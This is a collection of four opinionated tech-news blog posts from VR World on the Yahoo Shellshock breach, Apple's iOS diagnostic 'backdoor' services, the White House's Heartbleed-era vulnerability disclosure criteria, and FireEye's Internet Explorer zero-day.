A security researcher has discovered that Yahoo has become a victim of the newly discovered Shellshock vulnerability (also known as bash bug) via Romanian hackers gaining access to Yahoo’s systems. There is already confirmation of the fact that Yahoo has been hacked via an email from Yahoo’s security team. This was originally submitted to Yahoo, but isn’t eligible for their bug bounty program, which for some reason doesn’t reward people for finding chinks in Yahoo’s armor for them before hackers do. This appears to be a significant flaw in Yahoo’s security policies and must be addressed by Marissa Mayer herself.

He states:
Disclosure and disclaimer: This document is being released due to several high profile companies being infiltrated using the recent Shellshock vulnerability, and what I have deemed as an improper response, or lack thereof, to resolving the issue from certain key companies contacted, as well as the FBI. Amongst the affected companies are Yahoo! and Lycos, major players and names in the technology world. This breach affects ALL of us in one way or another, and it’s crucial that this problem be resolved with haste. The FBI took the information down and went on their way. Yahoo! has not responded at all. I’ve attempted to email them, call them, and resorted to contacting Marissa Mayer directly via both email and Twitter, neither to which I have received a response as of yet. The ignoring of this issue is grossly negligent and even almost criminal. As such, I felt that for the safety of anyone using these services, it would be best to publicly disclose as much information as needed to get them moving and working towards resolving the issue before things get worse. All research and testing discussed in this paper was performed by Jonathan D. Hall of Future South Technologies.

Yahoo has been struggling to gain back trust from users after their email data breaches and the overall meltdown of the company as an internet destination for most users. Under Marissa Mayer’s rule, the company has tried to become more of a content provider rather than a search or news destination. Their most popular applications like Flickr have struggled to really retain their audiences and regain the losses to other services like 500px due to simply being too unwilling to listen to the community and simply give them what they want. Flickr was once the default destination for professional and amateur photographers and since the service’s decline tons of viable competitors have cropped up to give people what they want.

The problem here for Yahoo is that they simply are not taking security risks seriously and continually find themselves the targets of hackers. Why? Because they appear not to take security as seriously as they say they do. And Yahoo still has a fairly large user base, especially Yahoo mail, which means that they become a big juicy target for hackers that know that Yahoo is slow to adapt and secure. The security game is an ever evolving one and if your security team is not constantly working to address new threats and actively working to prevent them, then you are going to end up like Yahoo, a sitting duck and popular target.

Yahoo has said to Bloomberg that three of their servers were compromised but that no data was taken, which may still need to be evaluated if only three servers were accessed.

The post Yahoo Hacked via Shellshock Vulnerability appeared first on VR World.

A security researcher is claiming to have found a set of services in iOS that appear to be a firmware-level backdoor in iOS devices. What’s more interesting is that Apple has, in a very non-Apple manner, responded to his claims by posting a support page about it. He claims that these are confirmations of the backdoors that he found in iOS and that Apple claims to use them for diagnostic and enterprise purposes. These backdoors can only be accessed by Apple (or anyone that has access to Apple’s services) so they’re mostly secure backdoors, but they are backdoors nonetheless. Most consumers are completely and wholly unaware that alternative pathways into their devices exist and can be exploited by ANYONE (in this case Apple) other than themselves. This is also why remote bricking and other ‘security’ features being pushed through legislatures are also a problem, but at least we’re aware of their existence unlike these services on iOS.

The services in question, om.apple.mobile.pcapd, com.apple.mobile.file_relay, com.apple.mobile.house_arrest among others have been addressed in Apple’s knowledge base article. Apple does not directly address Jonathan Zdziarski’s claims but instead tries to illuminate their use of these services and what they’re supposed to be used for. Apple claims that some of these services are used for diagnostic purposes internally as well as for iTunes and Apple Care support. However, the fact that these supposed backdoor services exist without users’ or developers’ knowledge is a bit worrisome.

The real truth here is that no matter what happens, or is really happening, customers should be aware of how intrusive some of these services are or can be. Sure, some of them are limited in scope in terms of what they can access, but even so, Apple should notify customers when they use such services or sign up for the operating system that there are services running on their devices that give Apple access to their device. Backdoor systems are not a joke and some of them are open invitations to hackers to try to hack into a backdoor and use it for their own purposes. Backdoors are inherently insecure and consumers should be made aware of them, malicious or not.

The post Security Researcher Claims iOS Devices Have a Backdoor appeared first on VR World.

On Monday, as a follow up to the awareness around the Heartbleed bug and all of the rumors that circulated around it, The Whitehouse posted a blog clarifying their stance on how they approach vulnerabilities such as Heartbleed. In fact, the NSA categorically denied any knowledge of the Heartbleed bug officially on Twitter, even though they have been known to lie to Congress and the American people without hesitation, so their honesty is a little more than at question.

So, what exactly are they going to disclose and when? Well, there’s a nifty little check list that the Whitehouse has provided us with so that we know when an agency should withhold information from the public and when it should make it public.

We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability:

• How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems?

• Does the vulnerability, if left unpatched, impose significant risk?

• How much harm could an adversary nation or criminal group do with knowledge of this vulnerability?

• How likely is it that we would know if someone else was exploiting it?

• How badly do we need the intelligence we think we can get from exploiting the vulnerability?

• Are there other ways we can get it?

• Could we utilize the vulnerability for a short period of time before we disclose it?

• How likely is it that someone else will discover the vulnerability?

• Can the vulnerability be patched or otherwise mitigated?

So, basically, The Whitehouse and the administration of Obama are basically saying that if a vulnerability doesn’t really affect us too much, but can gain us lots of valuable intelligence we should keep our mouths shut. What is interesting about this supposed “rigorous” process for vulnerability disclosure is that there is no time limit set for how long they are allowed to wait until they disclose a vulnerability. There is no limitation on how long they can leave a vulnerability open if it passes all of these checks that they’ve established. They mention utilizing the vulnerability for a short period of time, but that doesn’t actually mean anything because a short period of time could be a day, a week, a month, or a year.

With the Heartbleed bug and the public disclosure around it, there were a lot of companies scrambling to patch the bug and some attacks that utilized it immediately after its disclosure. However, if left unpatched, Heartbleed could have disasterous implications and would give any government with knowledge of it almost unlimited access across the web. As a result, many people simply don’t believe that The Whitehouse and the NSA were unaware of such a bug, especially since the NSA had quietly exploited countless other bugs continually without any concern.

The post The Whitehouse Says They Have Right to Withhold a Security Vulnerability appeared first on VR World.

Internet Explorer has had a pretty bad reputation over the years as a pretty awful browser, and from the IE6 through the IE9 days, that was a pretty accurate statement. However, nowadays Internet Explorer is fairly good and the only browser on Windows worth anything for touch. The guys and gals over at FireEye managed to discover this Zero Day Exploit and dubbed the entire operation, “Operation Clandestine Fox.” They claim that this zero day exploit targets IE9 through IE11 browsers, which make up about 26% of all browser users around the world which is pretty significant. Microsoft has also put out a security bulletin on the issue stating that users using IE6 through IE11 could be affected, which would broaden the scope of this issue by millions more users.

While Microsoft claims this issue is occurring in “limited attacks” the potential for this attack to grow is now exponentially greater now that the issue has been discovered but not yet fixed. We don’t know the details of how long FireEye waited to let Microsoft resolve this issue before they announced it, but I have a feeling they didn’t just post about it and expect Microsoft to deal with the repercussions. Microsoft is a much more serious company when it comes to security, which is what makes this IE zero day vulnerability all the more puzzling. The fact that such a zero day has managed to exist through potentially all versions of IE and only get caught now is also a bit suspicious (now that we live in the post-Snowden era where anything could be deliberate).

The vulnerability itself as described by the FireEye team is that the exploit leverages a previously unknown use-after-free vulnerability as well as a well-known flash exploit to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections. What this ultimately means for users is that if you’re using Internet Explorer right now, you should probably stop doing so and switch to Chrome or Firefox until this issue gets resolved. Personally, I use four different browsers simultaneously, but I don’t really recommend that to anyone, especially in this case. If you must absolutely use Internet Explorer, then you should disable Flash (or uninstall it) and use your browser with a proper anti-virus application, even though it would just be easier to use Chrome or Firefox in the meantime.

The post Time to Run and Hide from Internet Explorer, For Now appeared first on VR World.